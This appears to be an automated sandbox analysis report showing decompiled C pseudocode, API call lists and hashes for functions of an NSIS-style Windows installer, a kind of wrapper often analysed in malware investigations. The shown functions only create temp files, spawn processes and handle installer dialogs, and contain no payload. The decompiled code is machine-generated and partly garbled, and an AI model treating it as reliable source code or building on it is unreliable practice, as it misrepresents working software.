                C-Code - Quality: 100%
                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				intOrPtr _v8;
                				short _v12;
                				short _t12;
                				intOrPtr _t13;
                				signed int _t14;
                				WCHAR* _t17;
                				signed int _t19;
                				signed short _t23;
                				WCHAR* _t26;
                
                				_t26 = _a4;
                				_t23 = 0x64;
                				while(1) {
                					_t12 =  *L"nsa"; // 0x73006e
                					_t23 = _t23 - 1;
                					_v12 = _t12;
                					_t13 =  *0x40a57c; // 0x61
                					_v8 = _t13;
                					_t14 = GetTickCount();
                					_t19 = 0x1a;
                					_v8 = _v8 + _t14 % _t19;
                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                					if(_t17 != 0) {
                						break;
                					}
                					if(_t23 != 0) {
                						continue;
                					} else {
                						 *_t26 =  *_t26 & _t23;
                					}
                					L4:
                					return _t17;
                				}
                				_t17 = _t26;
                				goto L4;
                 			}

                APIs
                • GetTickCount.KERNEL32 ref: 0040607A
                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1857211195
                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E004015C1(short __ebx, void* __eflags) {
                				void* _t17;
                				int _t23;
                				void* _t25;
                				signed char _t26;
                				short _t28;
                				short _t31;
                				short* _t34;
                				void* _t36;
                
                				_t28 = __ebx;
                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                				_t17 = E00405EB7(_t16);
                				_t32 = _t17;
                				if(_t17 != __ebx) {
                					do {
                						_t34 = E00405E39(_t32, 0x5c);
                						_t31 =  *_t34;
                						 *_t34 = _t28;
                						if(_t31 != _t28) {
                							L5:
                							_t25 = E00405AEB( *(_t36 + 8));
                						} else {
                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                								goto L5;
                							} else {
                								_t25 = E00405A6E( *(_t36 + 8));
                							}
                						}
                						if(_t25 != _t28) {
                							if(_t25 != 0xb7) {
                								L9:
                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                							} else {
                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                								if((_t26 & 0x00000010) == 0) {
                									goto L9;
                								}
                							}
                						}
                						 *_t34 = _t31;
                						_t32 = _t34 + 2;
                					} while (_t31 != _t28);
                				}
                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                					if(_t23 == 0) {
                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                					}
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                				return 0;
                 			}

                APIs
                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 1892508949-1104044542
                • Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                • Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				signed int _t16;
                				signed int _t17;
                				void* _t18;
                
                				_t17 = _a4;
                				while(_t17 >= 0) {
                					_t6 = _t17 * 0x1c +  *0x434f30;
                					if( *_t6 == 1) {
                						break;
                					}
                					_push(_t6); // executed
                					_t8 = E00401434(); // executed
                					if(_t8 == 0x7fffffff) {
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;
                					} else {
                						_t12 = _t10 + 1;
                						_t17 = _t17 + 1;
                					}
                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                						 *0x433eec =  *0x433eec + _t12;
                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                					}
                				}
                				return 0;
                			}












                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Window$EnableShow
                • String ID:
                • API String ID: 1136574915-0
                • Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                • Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405B20(WCHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x430270->cb = 0x44;
                				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}






                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID:
                • API String ID: 3712363035-0
                • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040690A(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				signed int _t10;
                
                				_t10 = _a4 << 3;
                				_t8 =  *(_t10 + 0x40a3e0);
                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                				if(_t5 != 0) {
                					L2:
                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                				}
                				_t5 = E0040689A(_t8); // executed
                				if(_t5 == 0) {
                					return 0;
                				}
                				goto L2;
                			}






                APIs
                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesW(_a4); // executed
                				asm("sbb ecx, ecx");
                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                				return _t6;
                			}






                APIs
                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406008(WCHAR* _a4) {
                				signed char _t3;
                				signed char _t7;
                
                				_t3 = GetFileAttributesW(_a4); // executed
                				_t7 = _t3;
                				if(_t7 != 0xffffffff) {
                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                				}
                				return _t7;
                			}






                APIs
                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405AEB(WCHAR* _a4) {
                				int _t2;
                
                				_t2 = CreateDirectoryW(_a4, 0); // executed
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				return 0;
                			}





                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                • GetLastError.KERNEL32 ref: 00405AFF
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004060DF(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}






                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,000000FF,00000004,00000000), ref: 004060F3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004060B0(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}






                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004034E5(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                				return _t2;
                			}





                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00401FA4(void* __ecx) {
                				void* _t9;
                				intOrPtr _t13;
                				void* _t15;
                				void* _t17;
                				void* _t20;
                				void* _t22;
                
                				_t17 = __ecx;
                				_t19 = E00402DA6(_t15);
                				E0040559F(0xffffffeb, _t7);
                				_t9 = E00405B20(_t19); // executed
                				_t20 = _t9;
                				if(_t20 == _t15) {
                					 *((intOrPtr*)(_t22 - 4)) = 1;
                				} else {
                					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                						_t13 = E004069B5(_t17, _t20);
                						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                							if(_t13 != _t15) {
                								 *((intOrPtr*)(_t22 - 4)) = 1;
                							}
                						} else {
                							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                						}
                					}
                					_push(_t20);
                					CloseHandle();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                				return 0;
                			}










                APIs
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                  • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                  • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                  • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                  • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                • String ID:
                • API String ID: 2972824698-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403B12() {
                				void* _t1;
                				signed int _t6;
                
                				_t1 =  *0x40a018; // 0xffffffff
                				if(_t1 != 0xffffffff) {
                					CloseHandle(_t1);
                					 *0x40a018 =  *0x40a018 | 0xffffffff;
                					_t6 =  *0x40a018;
                				}
                				E00403B57();
                				return E00405C49(_t6, 0x443000, 7);
                			}

                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 95%
                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				long _v12;
                				struct tagRECT _v28;
                				void* _v36;
                				signed int _v40;
                				int _v44;
                				int _v48;
                				signed int _v52;
                				int _v56;
                				void* _v60;
                				void* _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t94;
                				long _t95;
                				int _t100;
                				void* _t108;
                				intOrPtr _t130;
                				struct HWND__* _t134;
                				int _t156;
                				int _t159;
                				struct HMENU__* _t164;
                				struct HWND__* _t168;
                				struct HWND__* _t169;
                				int _t171;
                				void* _t172;
                				short* _t173;
                				short* _t175;
                				int _t177;
                
                				_t169 =  *0x433ee4;
                				_t156 = 0;
                				_v8 = _t169;
                				if(_a8 != 0x110) {
                					if(_a8 == 0x405) {
                						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                					}
                					if(_a8 != 0x111) {
                						L17:
                						_t171 = 1;
                						if(_a8 != 0x404) {
                							L25:
                							if(_a8 != 0x7b) {
                								goto L20;
                							}
                							_t94 = _v8;
                							if(_a12 != _t94) {
                								goto L20;
                							}
                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                							_a8 = _t95;
                							if(_t95 <= _t156) {
                								L36:
                								return 0;
                							}
                							_t164 = CreatePopupMenu();
                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                							_t100 = _a16;
                							_t159 = _a16 >> 0x10;
                							if(_a16 == 0xffffffff) {
                								GetWindowRect(_v8,  &_v28);
                								_t100 = _v28.left;
                								_t159 = _v28.top;
                							}
                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                								_v60 = _t156;
                								_v48 = 0x42d268;
                								_v44 = 0x1000;
                								_a4 = _a8;
                								do {
                									_a4 = _a4 - 1;
                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                								} while (_a4 != _t156);
                								OpenClipboard(_t156);
                								EmptyClipboard();
                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                								_a4 = _t108;
                								_t172 = GlobalLock(_t108);
                								do {
                									_v48 = _t172;
                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                									 *_t173 = 0xd;
                									_t175 = _t173 + 2;
                									 *_t175 = 0xa;
                									_t172 = _t175 + 2;
                									_t156 = _t156 + 1;
                								} while (_t156 < _a8);
                								GlobalUnlock(_a4);
                								SetClipboardData(0xd, _a4);
                								CloseClipboard();
                							}
                							goto L36;
                						}
                						if( *0x433ecc == _t156) {
                							ShowWindow( *0x434f08, 8);
                							if( *0x434f8c == _t156) {
                								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                							}
                							E00404472(_t171);
                							goto L25;
                						}
                						 *0x42ba38 = 2;
                						E00404472(0x78);
                						goto L20;
                					} else {
                						if(_a12 != 0x403) {
                							L20:
                							return E00404500(_a8, _a12, _a16);
                						}
                						ShowWindow( *0x433ed0, _t156);
                						ShowWindow(_t169, 8);
                						E004044CE(_t169);
                						goto L17;
                					}
                				}
                				_v52 = _v52 | 0xffffffff;
                				_v40 = _v40 | 0xffffffff;
                				_t177 = 2;
                				_v60 = _t177;
                				_v56 = 0;
                				_v48 = 0;
                				_v44 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t130 =  *0x434f10;
                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                				_t134 = GetDlgItem(_a4, 0x3f8);
                				 *0x433ee4 = _t134;
                				_v8 = _t134;
                				E004044CE( *0x433ed0);
                				 *0x433ed4 = E00404E27(4);
                				 *0x433eec = 0;
                				GetClientRect(_v8,  &_v28);
                				_v52 = _v28.right - GetSystemMetrics(_t177);
                				SendMessageW(_v8, 0x1061, 0,  &_v60);
                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                				if(_a8 >= 0) {
                					SendMessageW(_v8, 0x1001, 0, _a8);
                					SendMessageW(_v8, 0x1026, 0, _a8);
                				}
                				if(_a12 >= _t156) {
                					SendMessageW(_v8, 0x1024, _t156, _a12);
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E00404499(_a4);
                				if(( *0x434f18 & 0x00000003) != 0) {
                					ShowWindow( *0x433ed0, _t156);
                					if(( *0x434f18 & 0x00000002) != 0) {
                						 *0x433ed0 = _t156;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E004044CE( *0x433ec8);
                				}
                				_t168 = GetDlgItem(_a4, 0x3ec);
                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                				if(( *0x434f18 & 0x00000004) != 0) {
                					SendMessageW(_t168, 0x409, _t156, _a12);
                					SendMessageW(_t168, 0x2001, _t156, _a8);
                				}
                				goto L36;
                			}

                APIs
                • GetDlgItem.USER32 ref: 0040573C
                • GetDlgItem.USER32 ref: 0040574B
                • GetClientRect.USER32 ref: 00405788
                • GetSystemMetrics.USER32 ref: 0040578F
                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                • ShowWindow.USER32(?,00000008), ref: 0040582B
                • GetDlgItem.USER32 ref: 0040584C
                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                • GetDlgItem.USER32 ref: 0040575A
                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                • GetDlgItem.USER32 ref: 0040589E
                • CreateThread.KERNEL32 ref: 004058AC
                • CloseHandle.KERNEL32(00000000), ref: 004058B3
                • ShowWindow.USER32(00000000), ref: 004058D7
                • ShowWindow.USER32(?,00000008), ref: 004058DC
                • ShowWindow.USER32(00000008), ref: 00405926
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                • CreatePopupMenu.USER32 ref: 0040596B
                • AppendMenuW.USER32 ref: 0040597F
                • GetWindowRect.USER32 ref: 0040599F
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
